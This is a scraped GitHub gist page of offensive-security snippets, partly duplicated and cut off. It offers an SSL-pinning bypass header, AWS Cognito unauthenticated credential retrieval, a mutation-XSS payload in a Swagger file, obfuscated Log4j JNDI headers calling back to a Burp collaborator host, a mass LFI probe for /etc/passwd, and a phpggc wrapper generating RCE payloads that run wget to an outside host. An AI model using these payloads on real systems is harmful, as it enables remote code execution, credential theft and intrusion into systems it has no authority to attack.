(inc0gbyt3) incogbyte

## mixunpin.js
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);

/**
 * by incogbyte
 * Common functions
 * thx apkunpacker, NVISOsecurity, TheDauntless
 * Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
 * !!! THIS SCRIPT IS NOT A SILVER BULLET !!

## google_cloud_debian_to_kali.md

      
              1 file
            
          
              3 forks
            
          
              3 comments
            
          
              5 stars
            
          
                incogbyte
                / google_cloud_debian_to_kali.md
            
            
              Last active
              April 4, 2024 16:25
            
              
                Convert Debian 10 or Ubuntu > 12 to Kali Linux on Google Cloud or Any Debian
              
          
    Convert Debian 10 to Kali Linux on Google Cloud or Any Debian
After you create an account on Google Cloud, and create your VPS using Debian 10, follow the below guide to convert your Debian to Kali Linux Latest Version:
Convert Debian to Kali:

Step 1:
apt-get update -y && apt-get full-upgrade -y && apt-get dist-upgrade -y && apt autoremove -y && apt autoclean

  
## fonts.sh
#!/bin/bash

sudo apt install fontconfig
cd ~
wget https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip
mkdir -p .local/share/fonts
unzip Meslo.zip -d .local/share/fonts
cd .local/share/fonts
rm *Windows*
cd ~

## cognito.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                incogbyte
                / cognito.md
            
            
              Created
              January 14, 2024 15:36
            
              
                cognito exploitation
              
          
Generate temporary AWS credentials using unauth user
1.1 - Get the poolId
2.1 - IdendityID
3.1 - Use the following command on aws-cli "example"
$ aws cognito-identity get-id --identity-pool-id "us-east-1:f3400f4e-6a41-47db-834c-4af6d56e8359" --region "us-east-1"
3.2 - Use the following command to get aws credentials
$ aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:f3400f4e-6a41-47db-834c-4af6d56e8359" --region "us-east-1"


## swagger-xss.yaml
swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>

  version: production
basePath: /JSSResource/
produces:
  - application/xml

## log4j.txt
        User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
        X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
        Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
        X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
        Authentication: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}

        User-Agent: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
        X-Api-Version: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
        Referer: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
        X-Forwarded-For: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}

## oneliners.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              4 stars
            
          
                incogbyte
                / oneliners.md
            
            
              Last active
              October 31, 2023 04:03
            
              
                One liners recon
              
          
FFUF fuzzing paths + Domains

assetfinder http://DOMAIN.COM | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w wordlist_paths -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'


LFI testing

gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'


## phpggc_wrapper.sh
#!/bin/bash

# Git clone this tool https://github.com/ambionics/phpggc
# phpggc wrapper that automatically generates payloads for RCE gadgets

function="system"
command="wget http://your.burpcollaborator.net/?"
# modify the options below depending on your use case
options="-a -b -u -f"

## words_from_subs.py
import re
import sys

def extract_subdomains(filename):
    subdomains = set()
    pattern = r"(?:https?://)?(?:www\.)?([^.]+\.[^.]+)"

    with open(filename, 'r') as file:
        for line in file:
            match = re.search(pattern, line)

## permute_wordlist.txt
1
10
11
12
13
14
15
16
17
18
	console.log("[*] SSL Pinning Bypasses");
	console.log(`[*] Your frida version: ${Frida.version}`);
	console.log(`[*] Your script runtime: ${Script.runtime}`);

	/**
	* by incogbyte
	* Common functions
	* thx apkunpacker, NVISOsecurity, TheDauntless
	* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
	* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
	#!/bin/bash

	sudo apt install fontconfig
	cd ~
	wget https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip
	mkdir -p .local/share/fonts
	unzip Meslo.zip -d .local/share/fonts
	cd .local/share/fonts
	rm Windows
	cd ~
	swagger: '2.0'
	info:
	title: Classic API Resource Documentation
	description: \|
	<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>

	version: production
	basePath: /JSSResource/
	produces:
	- application/xml
	User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
	X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
	Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
	X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
	Authentication: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}

	User-Agent: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
	X-Api-Version: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
	Referer: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
	X-Forwarded-For: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
	#!/bin/bash

	# Git clone this tool https://github.com/ambionics/phpggc
	# phpggc wrapper that automatically generates payloads for RCE gadgets

	function="system"
	command="wget http://your.burpcollaborator.net/?"
	# modify the options below depending on your use case
	options="-a -b -u -f"
	import re
	import sys

	def extract_subdomains(filename):
	subdomains = set()
	pattern = r"(?:https?://)?(?:www\.)?([^.]+\.[^.]+)"

	with open(filename, 'r') as file:
	for line in file:
	match = re.search(pattern, line)